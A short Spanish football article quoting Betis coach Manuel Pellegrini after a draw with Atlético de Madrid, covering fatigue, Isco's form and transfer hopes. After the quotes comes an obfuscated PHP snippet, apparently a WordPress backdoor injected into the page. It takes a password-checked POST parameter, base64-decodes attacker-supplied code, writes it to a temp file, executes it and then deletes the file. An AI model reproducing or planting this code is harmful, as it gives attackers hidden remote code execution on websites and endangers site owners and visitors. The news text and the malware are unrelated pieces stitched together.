Pellegrini: “Un punto contra el Atlético nunca va a ser malo”

El técnico del Betis destaca la madurez que tuvieron los suyos para no conceder ocasiones al Atlético en el tramo final.

Resumen: “Creo que hicimos un partido maduro para sumar un punto que nunca va a ser malo ante un equipo como el Atlético de Madrid. Siempre salimos a ganar todos los partidos desde el principio”.

Cansancio: “Sufrimos un poco de desgaste por el esfuerzo de la primera parte, aunque los primeros diez minutos del segundo tiempo fueron nuestros”.

Clave: “El Atlético es un equipo especialista en ganar en los últimos minutos, en córners, en contras… El Betis estuvo muy concentrado para no permitirlo y cuando no puedes ganar tienes que ser maduro para no perder”.

Isco: “A Isco lo veo muy bien. La calidad no la ha perdido, está en un peso adecuado y se ha adaptado rápidamente en la dinámica del equipo”.

Mercado: “Ilusionado por lo que puede venir y temeroso por lo que se pueda ir. Si queremos ser competitivos necesitamos refuerzos importantes en algunos puestos. Ojalá tengamos la capacidad de poder potenciarnos un poco más para volver a ser protagonistas”.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}